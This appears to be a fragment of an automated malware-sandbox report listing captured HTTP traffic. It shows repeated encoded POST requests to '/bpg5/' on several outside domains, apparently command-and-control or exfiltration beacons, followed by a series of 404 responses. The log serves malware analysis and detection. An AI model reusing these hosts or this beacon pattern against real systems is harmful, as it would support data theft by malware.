4e 43 4a 73 69 72 63 37 50 65 2d 5a 67 6d 4f 69 5f 5
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.vns96.netConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.vns96.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vns96.net/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 53 56 30 73 59 78 4f 65 4a 58 4f 5a 4b 49 77 52 6e 70 76 67 53 64 52 75 48 74 41 65 42 44 47 76 47 5a 56 6f 39 55 65 34 6a 35 57 74 77 53 5a 36 38 78 63 57 6b 56 6e 37 54 4a 41 4f 59 50 53 67 34 30 66 53 34 71 4d 63 50 4d 46 37 6e 52 5a 78 4d 56 7a 4c 71 68 33 67 46 79 77 2d 36 5f 6b 58 7e 41 66 76 31 38 76 35 4e 34 39 6c 38 42 43 76 75 63 6b 4b 49 50 4a 46 43 54 75 66 74 6a 41 61 44 2d 46 48 51 63 65 43 58 37 4b 78 72 31 6e 6f 71 52 47 71 51 5f 79 58 50 6a 7e 78 49 75 4e 53 78 36 46 7a 72 52 74 53 5a 37 69 5a 70 31 4f 48 6c 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: lpw7=SV0sYxOeJXOZKIwRnpvgSdRuHtAeBDGvGZVo9Ue4j5WtwSZ68xcWkVn7TJAOYPSg40fS4qMcPMF7nRZxMVzLqh3gFyw-6_kX~Afv18v5N49l8BCvuckKIPJFCTuftjAaD-FHQceCX7Kxr1noqRGqQ_yXPj~xIuNSx6FzrRtSZ7iZp1OHlA).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.thetowerbells.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.thetowerbells.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thetowerbells.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 61 74 58 4f 71 70 4e 33 79 4b 36 6d 4a 69 6a 78 65 32 68 4e 7a 75 53 37 55 4d 79 67 7e 30 46 54 62 58 37 6e 6b 56 43 46 56 34 32 76 52 52 79 48 34 44 79 76 44 69 65 6a 63 6c 36 38 73 70 73 4e 73 48 69 42 46 59 56 55 71 65 35 59 46 32 50 73 47 35 7e 34 49 39 36 70 31 64 64 33 54 79 57 7a 64 64 7e 72 50 39 5a 51 46 41 53 4d 57 4f 35 71 55 43 48 55 50 6b 47 7a 75 7a 4c 6d 73 2d 75 50 44 41 30 66 4d 57 58 66 39 7a 70 72 62 46 68 59 5a 31 62 45 53 32 6c 69 65 47 38 59 70 6b 4f 64 59 34 42 63 55 78 7e 4e 50 76 4c 6a 6b 65 46 6a 55 74 6f 42 6d 44 51 37 6b 58 67 5f 64 73 28 62 4a 32 51 42 42 63 48 57 53 38 65 78 35 37 67 54 66 59 50 54 34 7a 41 43 55 45 4c 6e 5a 57 66 45 75 75 44 2d 4c 69 57 2d 34 39 7e 4a 45 47 71 6c 49 34 6b 47 79 6d 47 76 44 32 4d 69 6a 70 66 65 67 54 68 6e 46 69 58 56 43 54 4a 49 30 66 4c 5f 6b 4a 4a 52 37 57 68 58 42 61 4b 67 72 44 61 72 75 6b 4c 39 46 78 37 66 73 45 49 54 67 32 63 55 36 55 33 4b 47 39 36 5f 70 77 68 36 59 4e 68 5a 38 69 6d 7a 67 5f 50 44 5a 6e 77 71 4e 55 36 2d 78 4d 52 4a 4b 66 5a 72 78 6a 6d 5a 54 6d 35 71 36 41 4f 46 39 55 41 36 4f 73 4e 4b 41 4e 37 6a 75 5a 53 67 6e 73 46 4c 76 39 61 46 53 76 63 73 71 55 6c 41 30 30 35 6a 34 43 28 44 66 72 64 51 54 37 59 44 59 45 38 41 66 35 64 35 7a 62 77 30 68 46 54 77 37 5a 31 36 4a 4c 44 68 74 6b 46 77 41 4c 72 4f 72 45 4e 32 59 41 58 35 45 41 79 50 35 52 72 44 7a 35 64 70 44 67 38 6b 49 6a 5a 71 28 68 65 33 6b 4d 45 78 59 4d 64 59 74 30 47 41 54 75 7a 5a 74 61 4b 4b 57 33 41 69 4b 35 70 56 62 59 63 64 41 30 34 78 61 77 31 6d 70 7a 45 45 4b 2d 4a 68 39 41 78 6f 71 45 5a 6b 79 7a 4d 72 6a 73 44 6e 76 37 39 4d 5a 73 41 5f 6a 77 59 36 48 58 62 76 75 5a 6b 54 58 48 62 4d 34 33 56 5a 77 6f 33 2d 51 54 75 78 7a 36 4e 44 32 67 4b 57 77 53 6a 45 6e 35 34 59 55 63 53 49 68 57 4d 2d 5a 69 54 77 78 66 75 64 73 5a 4f 67 73 6d 70 75 62 65 65 6b 4d 61 6d 2d 4c 32 77 54 67 76 54 35 66 43 50 41 35 53 34 61 4e 50 33 4a 55 58 4e 41 6b 32 36 45 30 46 71 48 6d 62 43 31 66 69 58 6e 69 59 32 62 6a 36 50 41 42 5f 61 47 62 38 48 6a 64 38 70 73 64 34 69 4e 43 74 62 78 66 41 74 49 64 59 62 6e 35 42 55 38 77 6b 55 35 6b 57 52 4b 4f 6c 78 5a 28 58 39 59 56 4d 6d 35 30 79 76 4e 4a 37 41 2d 68 50 71 62 67 59 4f 64 28 75 52 70 61 31 61 50 78 68 4e 77 28 30 63 2d 28 49 6c 55 69 54 58 5f 49 72 6f 45 42 2d 49 79 45 59 4d 71 4a 38 62 49 78 33 33 70 31 33 4e 59 61 67 47 4f 51 6f 48 66 79 33 35 36 57 34 56 31 37 33 41 31 65 5a 53 6f 37 4f 53 64 4a 46 53 42 43 49 66 72 41 63 54 32 61 43 58 6c 33 67 32 59 4e 74 55 4c 6b 38 28 33 48 52 69 74 63 68 67 76 7a 51 34 30 44 4b 58 4d 69 75 52 55 6
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.thetowerbells.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.thetowerbells.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thetowerbells.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 61 74 58 4f 71 70 4e 33 79 4b 36 6d 4a 69 6a 78 65 32 68 4e 7a 75 53 37 55 4d 79 67 7e 30 46 54 62 58 37 6e 6b 56 43 46 56 34 32 76 52 52 79 48 34 44 79 76 44 69 65 6a 63 6c 36 38 73 70 73 4e 73 48 69 42 46 59 56 55 71 65 35 59 46 32 50 73 47 35 7e 34 49 39 36 70 31 64 64 33 54 79 57 7a 64 64 7e 72 50 39 5a 51 46 41 53 4d 57 4f 35 71 55 43 48 55 50 6b 47 7a 75 7a 4c 6d 73 2d 75 50 44 41 30 66 4d 57 58 66 39 7a 70 72 62 46 68 59 5a 31 62 45 53 32 6c 69 65 47 38 59 70 6b 4f 64 59 34 42 63 55 78 7e 4e 50 76 4c 6a 6b 65 46 6a 55 74 6f 42 6d 44 51 37 6b 58 67 5f 64 73 28 62 4a 32 51 42 42 63 48 57 53 38 65 78 35 37 67 54 66 59 50 54 34 7a 41 43 55 45 4c 6e 5a 57 66 45 75 75 44 2d 4c 69 57 2d 34 39 7e 4a 45 47 71 6c 49 34 6b 47 79 6d 47 76 44 32 4d 69 6a 70 66 65 67 54 68 6e 46 69 58 56 43 54 4a 49 30 66 4c 5f 6b 4a 4a 52 37 57 68 58 42 61 4b 67 72 44 61 72 75 6b 4c 39 46 78 37 66 73 45 49 54 67 32 63 55 36 55 33 4b 47 39 36 5f 70 77 68 36 59 4e 68 5a 38 69 6d 7a 67 5f 50 44 5a 6e 77 71 4e 55 36 2d 78 4d 52 4a 4b 66 5a 72 78 6a 6d 5a 54 6d 35 71 36 41 4f 46 39 55 41 36 4f 73 4e 4b 41 4e 37 6a 75 5a 53 67 6e 73 46 4c 76 39 61 46 53 76 63 73 71 55 6c 41 30 30 35 6a 34 43 28 44 66 72 64 51 54 37 59 44 59 45 38 41 66 35 64 35 7a 62 77 30 68 46 54 77 37 5a 31 36 4a 4c 44 68 74 6b 46 77 41 4c 72 4f 72 45 4e 32 59 41 58 35 45 41 79 50 35 52 72 44 7a 35 64 70 44 67 38 6b 49 6a 5a 71 28 68 65 33 6b 4d 45 78 59 4d 64 59 74 30 47 41 54 75 7a 5a 74 61 4b 4b 57 33 41 69 4b 35 70 56 62 59 63 64 41 30 34 78 61 77 31 6d 70 7a 45 45 4b 2d 4a 68 39 41 78 6f 71 45 5a 6b 79 7a 4d 72 6a 73 44 6e 76 37 39 4d 5a 73 41 5f 6a 77 59 36 48 58 62 76 75 5a 6b 54 58 48 62 4d 34 33 56 5a 77 6f 33 2d 51 54 75 78 7a 36 4e 44 32 67 4b 57 77 53 6a 45 6e 35 34 59 55 63 53 49 68 57 4d 2d 5a 69 54 77 78 66 75 64 73 5a 4f 67 73 6d 70 75 62 65 65 6b 4d 61 6d 2d 4c 32 77 54 67 76 54 35 66 43 50 41 35 53 34 61 4e 50 33 4a 55 58 4e 41 6b 32 36 45 30 46 71 48 6d 62 43 31 66 69 58 6e 69 59 32 62 6a 36 50 41 42 5f 61 47 62 38 48 6a 64 38 70 73 64 34 69 4e 43 74 62 78 66 41 74 49 64 59 62 6e 35 42 55 38 77 6b 55 35 6b 57 52 4b 4f 6c 78 5a 28 58 39 59 56 4d 6d 35 30 79 76 4e 4a 37 41 2d 68 50 71 62 67 59 4f 64 28 75 52 70 61 31 61 50 78 68 4e 77 28 30 63 2d 28 49 6c 55 69 54 58 5f 49 72 6f 45 42 2d 49 79 45 59 4d 71 4a 38 62 49 78 33 33 70 31 33 4e 59 61 67 47 4f 51 6f 48 66 79 33 35 36 57 34 56 31 37 33 41 31 65 5a 53 6f 37 4f 53 64 4a 46 53 42 43 49 66 72 41 63 54 32 61 43 58 6c 33 67 32 59 4e 74 55 4c 6b 38 28 33 48 52 69 74 63 68 67 76 7a 51 34 30 44 4b 58 4d 69 75 52 55 6
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.thetowerbells.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.thetowerbells.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thetowerbells.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 61 74 58 4f 71 70 4e 33 79 4b 36 6d 4a 6c 28 78 64 43 56 4e 31 2d 53 37 5a 73 79 67 30 55 46 4a 62 58 28 46 6b 58 76 41 56 50 43 76 52 68 69 48 28 78 4b 76 43 69 65 73 58 46 36 34 79 5a 74 50 73 48 69 6a 46 64 74 55 71 65 64 59 58 43 6e 73 41 34 7e 37 4c 4e 36 52 38 39 64 79 54 79 61 70 64 64 79 37 50 39 42 51 46 48 32 4d 56 4f 70 71 65 42 76 55 61 45 47 71 6f 7a 4b 5f 73 2d 69 57 44 45 51 48 4d 57 72 66 7e 42 4e 72 43 78 74 59 54 43 48 45 64 57 6c 6e 55 6d 39 38 68 58 6e 5a 56 37 34 69 62 6e 65 2d 4a 4c 6e 30 68 76 31 71 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: lpw7=atXOqpN3yK6mJl(xdCVN1-S7Zsyg0UFJbX(FkXvAVPCvRhiH(xKvCiesXF64yZtPsHijFdtUqedYXCnsA4~7LN6R89dyTyapddy7P9BQFH2MVOpqeBvUaEGqozK_s-iWDEQHMWrf~BNrCxtYTCHEdWlnUm98hXnZV74ibne-JLn0hv1qDQ).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Thu, 25 May 2023 09:36:08 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 May 2023 09:36:19 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 May 2023 09:36:21 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 May 2023 09:36:24 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 May 2023 09:36:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 May 2023 09:36:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 May 2023 09:36:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 May 2023 09:37:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: LiteSpeedx-powered-by: PHP/8.1.19expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"content-encoding: gzipvary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedData Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 5b 7a Data Ascii: 3e4
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 May 2023 09:37:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: LiteSpeedx-powered-by: PHP/8.1.19expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"content-encoding: gzipvary: Accept-Encoding,Accept-Encodingx-turbo-charged-by: LiteSpeedData Raw: 39 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 